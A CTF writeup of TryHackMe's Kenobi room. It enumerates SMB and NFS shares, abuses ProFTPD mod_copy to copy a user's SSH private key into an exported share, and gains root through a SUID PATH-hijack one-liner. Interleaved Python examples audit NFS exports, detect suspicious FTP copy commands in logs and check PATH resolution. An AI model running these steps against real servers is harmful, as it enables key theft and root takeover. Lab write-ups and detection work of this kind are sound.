Kenobi Writeup - TryHackMe

Welcome to the writeup of the Kenobi room from TryHackMe (CTF).

Pedro Mariano


It's another room from a famous franchise (Star Wars), but it's less themed than the Biohazard room (here is my Biohazard Walkthrough), so this will be a straightforward writeup.

Here we go...


"Description: This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary."

IP: 10.10.128.132

Enumeration

sudo nmap -v -sSV -Pn 10.10.128.132 -oN nmap/scan
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap identified several open ports, but we won't stop with the basic scan. Let's run some NSE scripts against the interesting services.

Nmap - SMB

sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.128.132 -oN nmap/smb
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.128.132\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.128.132\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.128.132\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

With the "smb-enum" scripts we found shares that we can try to access and explore using smbclient.

smbclient //10.10.128.132/anonymous
dir
. D 0 Wed Sep 4 03:49:09 2019
.. D 0 Wed Sep 4 03:56:07 2019
log.txt N 12237 Wed Sep 4 03:49:09 2019
get log.txt
cat log.txt --> reveals information about the SSH key and the FTP server

Reading this log.txt file gives us some interesting information about an SSH key and the FTP server configuration.

Nmap - RPC

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.128.132
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836524.0 6877104.0 22% 16.0T 32000

With the "nfs" scripts we enumerated an exported network file system (/var, exported to every host), which we can now try to mount.
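From the defender's side, the "/var *" line that nfs-showmount reported is the kind of export that should never pass a configuration review. The following Python script is an added example (not part of the original writeup and not a TryHackMe or Kenobi artifact): it parses /etc/exports content and flags world-accessible clients, writable world exports, no_root_squash, and exports of whole system directories. The sample exports content is constructed; only the "/var *" export mirrors what the scan found, and its options are assumed.

```python
import re

# Constructed /etc/exports content. The first export mirrors the "/var *"
# that nfs-showmount reported; its options and the other lines are made up.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/var *(ro,sync,no_subtree_check)
/home/kenobi/share *(rw,sync,no_root_squash)
/srv/share 10.0.0.0/24(ro,sync,root_squash)
/export/data 10.0.0.5(rw,sync,root_squash,no_subtree_check)
"""

# Directories that should not be exported wholesale: they contain
# credentials, logs, package state or home directories.
SYSTEM_DIRS = {"/", "/var", "/etc", "/usr", "/home", "/root", "/boot"}

# One client token: "host" or "host(opt1,opt2)"; host may be empty or "*".
CLIENT_RE = re.compile(r'^(?P<client>[^(\s]*)(?:\((?P<opts>[^)]*)\))?$')


def parse_exports(text):
    """Yield (path, client, options) for every client of every export line.
    A line with no client exports to all hosts; missing options fall back to
    the exportfs defaults (ro, root_squash), so they are simply absent here."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]
        for token in clients:
            m = CLIENT_RE.match(token)
            if not m:
                continue
            opts = {o.strip() for o in (m["opts"] or "").split(",") if o.strip()}
            yield path, m["client"] or "*", opts


def audit_exports(text):
    """Return [(path, client, [reason codes])] for every risky export."""
    findings = []
    for path, client, opts in parse_exports(text):
        reasons = []
        world = client == "*" or client.startswith("*")
        if world:
            reasons.append("WORLD_CLIENT")        # any host may mount it
        if world and "rw" in opts:
            reasons.append("RW")                  # anyone can write to it
        if "no_root_squash" in opts:
            reasons.append("NO_ROOT_SQUASH")      # remote root stays root
        norm = path if path == "/" else path.rstrip("/")
        if norm in SYSTEM_DIRS:
            reasons.append("SYSTEM_DIR")          # exposes a whole system tree
        if reasons:
            findings.append((path, client, reasons))
    return findings


if __name__ == "__main__":
    for path, client, reasons in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {', '.join(reasons)}")
```

Run against the real file with `audit_exports(open("/etc/exports").read())`. The /srv/share line in the sample shows the shape a reviewed export should have: a specific client network, ro, and root_squash, with any writable export restricted to the hosts that actually need it.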

Exploitation

The ProFTPD version running on the server ships the mod_copy module, whose "SITE CPFR" and "SITE CPTO" commands copy files or directories from one place to another on the server. Using the information from log.txt, we can determine the location of the SSH key and copy it into the exported /var share.

nc -v 10.10.128.132 21
Connection to 10.10.128.132 21 port [tcp/ftp] succeeded!
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.128.132]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
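The exchange above leaves a clear trace if ProFTPD writes an ExtendedLog. As an added example (not part of the original writeup, not ProFTPD's own code), the Python detector below pairs a successful SITE CPFR with the SITE CPTO that follows it for the same client and user, then flags copies made by anonymous users or sourced from credential-like paths. It assumes an ExtendedLog with ProFTPD's default LogFormat (`%h %l %u %t "%r" %s %b`); the log lines are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample in ProFTPD's default ExtendedLog LogFormat
# ("%h %l %u %t \"%r\" %s %b"); these lines are made up for the example.
SAMPLE_LOG = """\
10.10.14.3 UNKNOWN anonymous [04/Sep/2019:08:41:12 +0000] "USER anonymous" 331 -
10.10.14.3 UNKNOWN anonymous [04/Sep/2019:08:41:15 +0000] "SITE CPFR /home/kenobi/.ssh/id_rsa" 350 -
10.10.14.3 UNKNOWN anonymous [04/Sep/2019:08:41:18 +0000] "SITE CPTO /var/tmp/id_rsa" 250 -
10.10.14.7 UNKNOWN kenobi [04/Sep/2019:09:02:00 +0000] "RETR notes.txt" 226 512
10.10.14.7 UNKNOWN kenobi [04/Sep/2019:09:02:30 +0000] "SITE CPFR /home/kenobi/share/a.txt" 350 -
10.10.14.7 UNKNOWN kenobi [04/Sep/2019:09:02:31 +0000] "SITE CPTO /home/kenobi/share/b.txt" 250 -
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<status>\d{3}) \S+$'
)
SITE_RE = re.compile(r'^SITE\s+(?P<op>CPFR|CPTO)\s+(?P<path>\S.*)$', re.IGNORECASE)

ANON_USERS = {"anonymous", "ftp"}
# Source paths that a plain FTP copy has no business touching.
SENSITIVE_MARKERS = ("/.ssh/", "/etc/shadow", "/etc/passwd", "/root/")


@dataclass
class CopyEvent:
    host: str
    user: str
    time: str
    src: str
    dst: str


def extract_copy_events(log_text):
    """Pair each accepted CPFR (350) with the next accepted CPTO (250)
    from the same host and user, yielding one CopyEvent per server-side copy."""
    pending = {}
    events = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        s = SITE_RE.match(m["cmd"])
        if not s:
            continue
        key = (m["host"], m["user"])
        op = s["op"].upper()
        if op == "CPFR" and m["status"] == "350":
            pending[key] = s["path"]
        elif op == "CPTO" and m["status"] == "250" and key in pending:
            events.append(CopyEvent(m["host"], m["user"], m["time"],
                                    pending.pop(key), s["path"]))
    return events


def flag_suspicious(events):
    """Return [(event, [reasons])] for copies that warrant an alert."""
    flagged = []
    for ev in events:
        reasons = []
        if ev.user.lower() in ANON_USERS:
            reasons.append("anonymous user issued a SITE copy")
        if any(marker in ev.src for marker in SENSITIVE_MARKERS):
            reasons.append("source path looks like a credential or system file")
        if reasons:
            flagged.append((ev, reasons))
    return flagged


if __name__ == "__main__":
    for ev, reasons in flag_suspicious(extract_copy_events(SAMPLE_LOG)):
        print(f"{ev.time} {ev.host} {ev.user}: {ev.src} -> {ev.dst} ({'; '.join(reasons)})")
```

The kenobi-to-kenobi copy inside the user's own share is reported as an event but not flagged, which keeps legitimate use of mod_copy out of the alert stream. Detection is the second line; the first is not loading mod_copy at all (or upgrading ProFTPD) on a server that allows anonymous logins.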

With the key copied to /var/tmp, a path we can reach through the NFS export, we mount the share and read the key directly.

sudo mkdir /mnt/kenobiNFS
sudo mount 10.10.128.132:/var /mnt/kenobiNFS/
cd /mnt/kenobiNFS/tmp

Now we can log in to the server using the SSH key.

sudo chmod 600 id_rsa
ssh kenobi@10.10.128.132 -i id_rsa
kenobi@kenobi:~$ wc -c user.txt
33 user.txt

With access to the machine as the "kenobi" user, we can read the user flag.

Privilege Escalation

Checking for misconfigurations that allow privilege escalation, we find the binary /usr/bin/menu with the SUID bit set, which means it runs with root privileges.

find / -perm -u=s -type f 2>/dev/null


But we need to understand how the binary works before we can exploit it. So, let's run it.


It appears to call commands such as "curl" and "ifconfig" for options "1" and "3", and it calls them without a full path (curl instead of /usr/bin/curl). So we can set the PATH variable to a directory we control and create a file there with the same name as the command called by /usr/bin/menu, but with different contents :D

Example:

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

Because the binary runs as root (SUID), the "/bin/sh" in our file, found first through the modified PATH, runs as root too. So, choosing the menu option that calls the replaced command gives us a root shell \o/
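The root cause is that a privileged program resolved a bare command name through a PATH the caller controls. As an added example (not part of the original writeup and not the menu binary's code), the Python below shows the resolution behaviour side by side: a throwaway directory holding a harmless script named "curl" is placed at the front of PATH, shell-style resolution picks it up, while a hardened resolver that ignores the environment and searches only a fixed trusted path does not. It also includes the audit a reviewer would run on a PATH: which entries are writable by the current user. TRUSTED_PATH is an assumed value.

```python
import os
import shutil
import stat
import tempfile

# Fixed search path a privileged program should use instead of trusting the
# caller's environment (assumed value; adjust to the host's layout).
TRUSTED_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_like_shell(command, path):
    """Resolve a bare command name the way a shell or system(3) does:
    walk PATH left to right and return the first executable file found."""
    return shutil.which(command, path=path)


def resolve_hardened(command):
    """Resolve using only TRUSTED_PATH; the caller's PATH is never consulted.
    A setuid program should do this (or use absolute paths) before exec."""
    return shutil.which(command, path=TRUSTED_PATH)


def writable_path_entries(path):
    """Return PATH entries the current user can write to, or that are
    world-writable. Any such entry ahead of the system directories lets a
    caller substitute binaries for programs that run bare command names."""
    flagged = []
    for entry in path.split(os.pathsep):
        if not entry or not os.path.isdir(entry):
            continue
        mode = os.stat(entry).st_mode
        if os.access(entry, os.W_OK) or mode & stat.S_IWOTH:
            flagged.append(entry)
    return flagged


def demo():
    """Contrast shell-style and hardened resolution using a temporary
    directory that contains a harmless script named 'curl'."""
    with tempfile.TemporaryDirectory() as tmp:
        decoy = os.path.join(tmp, "curl")
        with open(decoy, "w") as fh:
            fh.write("#!/bin/sh\necho 'decoy ran instead of curl'\n")
        os.chmod(decoy, 0o755)
        caller_path = tmp + os.pathsep + TRUSTED_PATH  # what the caller exports
        return {
            "tmp": tmp,
            "decoy": decoy,
            "shell_resolves_to": resolve_like_shell("curl", caller_path),
            "hardened_resolves_to": resolve_hardened("curl"),
            "writable_entries": writable_path_entries(caller_path),
        }


if __name__ == "__main__":
    result = demo()
    print("shell-style resolution :", result["shell_resolves_to"])
    print("hardened resolution    :", result["hardened_resolves_to"])
    print("writable PATH entries  :", result["writable_entries"])
```

The fix for a binary like /usr/bin/menu is the hardened branch: call commands by absolute path, or set PATH to a fixed value before invoking anything, and never hand root to a child process that inherits the caller's environment. Running `writable_path_entries(os.environ["PATH"])` on a host is a quick way to spot a PATH that already contains a user-writable directory.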


Now we have full control of the machine and can read the root flag at /root/root.txt.


Thanks for reading and feel free to pingback a coffee ;D
